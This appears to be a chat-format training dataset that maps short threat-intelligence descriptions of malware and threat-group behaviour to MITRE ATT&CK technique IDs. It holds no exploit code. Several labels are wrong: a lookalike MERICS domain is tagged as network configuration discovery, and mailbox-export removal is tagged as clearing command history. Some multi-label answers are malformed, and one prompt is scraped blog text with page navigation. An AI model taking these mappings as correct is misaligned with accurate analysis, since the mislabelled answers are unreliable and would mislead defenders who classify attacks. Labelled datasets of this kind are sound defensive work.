- "content": "Netwalker can determine the system architecture it is running on to choose which version of the DLL to use."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MURKYTOP: a command-line reconnaissance tool"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer has infected victims using watering holes."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "provides access to the system via SSH or any other protocol that uses PAM to authenticate."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has the ability to communicate with C2 over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware component, test.exe, uses the Windows command \"cmd.exe\" /C whoami” to verify it is running with the elevated privileges of “System” and creates persistence by creating the following scheduled task"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed) to maintain access to credentials and certain permission levels within an environment (Account Manipulation [T1098]) - Steal the credentials of a specific user or service account to bypass access controls and retain access to remote systems and externally available services (Valid Accounts [T1078]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse the Windows DLLs search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence (Hijack Execution Flow: DLL Search Order Hijacking [T1056.004]) - Exploit hooking to load and execute malicious code within the context of another process to mask the execution, allow access to the process’s memory, and, possibly, gain elevated privileges (Input Capture: Credential API Hooking [T1574.001]) - Use remote services to persist within a victim’s network (External Remote Services [T1133"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell', 'T1569.002 - System Services: Service Execution', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie has encrypted network communications with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The structure of the domain mimics the Mercator Institute for China Studies (MERICS), whose actual domain is merics.org"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete had a module in its malware to find, encrypt, and upload files from fixed and removable drives."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEXTMATE uses DNS TXT records for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can use TCP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of retrieving information about the infected system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN encrypts the collected files using 3-DES."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has removed mailbox export requests from compromised Exchange servers."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal on Host: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to create a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pasam establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1547.008 - Boot or Logon Autostart Execution: LSASS Driver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DDKONG lists files on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "recursively generates a list of files within a directory and sends them back to the control server."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has created new LinkedIn and Twitter accounts to conduct social engineering against potential victims."
- },
- {
- "role": "assistant",
- "content": "T1585.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to “AlwaysNotify\"."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used powershell.exe to download and execute scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has used AES to exfiltrate documents."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has connected to C2 servers through proxies."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has collected the user name from a compromised host using `GetUserNameA`."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windigo has distributed Windows malware via drive-by downloads."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's server component can download remote files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Using legitimate tools like PsExec will save the adversary time from writing their own tooling. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - ▼ February (14) CannibalRAT targets Brazil Who Wasn’t Responsible for Olympic Destroyer"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use modules that extract passwords from common web browsers such as Firefox and Chrome."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "certutil is a WIndows component that can download external content to the computer. In a typical attack, the criminals follow this paradigm"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has used \"printf\" and file I/O loops to delay process execution as part of API hammering."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a customized XOR algorithm to encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Microsoft Sysinternals is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Sharpshooter, the threat actors staged malicious files on Dropbox and other websites."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaRicto has used a layer of proxies to manage C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can record the sounds from microphones on a computer."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 created tokens using compromised SAML signing certificates."
- },
- {
- "role": "assistant",
- "content": "T1606.002 - Forge Web Credentials: SAML token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has harvested valid administrative credentials for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has executed commands using \"cmd.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site."
- },
- {
- "role": "assistant",
- "content": "T1195 - Supply Chain Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Linux version of checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. also gathers the username of the victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak has obtained and used open-source tools such as PsExec and Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "steals credentials from its victims."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is executed using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has spread through emails with malicious links."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can capture screenshots of the infected system using the `gdi32` library."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used stolen cookies to access cloud resources, and a forged \"duo-sid\" cookie to bypass MFA set on an email account."
- },
- {
- "role": "assistant",
- "content": "T1550.004 - Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the script stores the encrypted payload in the Windows registry. Note that the attackers seem to use a different registry location per organization. Thus, it is not a useful indicator to detect similar intrusions"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackLotus claims to come with anti-virtual machine (anti-VM), anti-debug, and code obfuscation features to block malware analysis attempts. The seller also claims that security software cannot detect and kill the bootkit as it runs under the SYSTEM account within a legitimate process."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 servers communicated with malware over TCP 8081, 8282, and 8083."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton gathers credentials in files for 1password."
- },
- {
- "role": "assistant",
- "content": "T1555.005 - Password Managers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf can take screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the target’s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group’s familiarity with Windows network administration"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Morphisec has investigated different samples from the same campaign. The following analysis presents our findings, focusing on the additional sophistication patterns and attribution patterns"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI can collect the current timestamp of the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has used SSL and TLS in communications with C2."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the command line."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has deployed tools after moving laterally using administrative accounts."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download files remotely."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Autorun manager subsystem is responsible for tracking the way that the malicious module starts in the system and it maintains several different methods for starting automatically (shown below): LinkAutorun The subsystem searches for a LNK file in the target directory, changes the path to “cmd.exe” and the description to ‘ /q /c start “” “%s” && start “” “%s” ‘ TaskScheduler20Autorun The subsystem creates the ITaskService (works only on Windows Vista+) and uses the ITaskService interface to create a new task with a logon trigger StartupAutorun The subsystem creates a LNK file in %STARTUP% ScreenSaverAutorun The subsystem installs as a current screensaver with a hidden window HiddenTaskAutorun The subsystem creates the task ITaskScheduler (works only on pre-Vista NT). The task trigger start date is set to the creation date of the Windows directory ShellAutorun Winlogon registry [HKCUSoftwareMicrosoftWindows NTCurrentVersionWinlogon] Shell=”explorer.exe"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
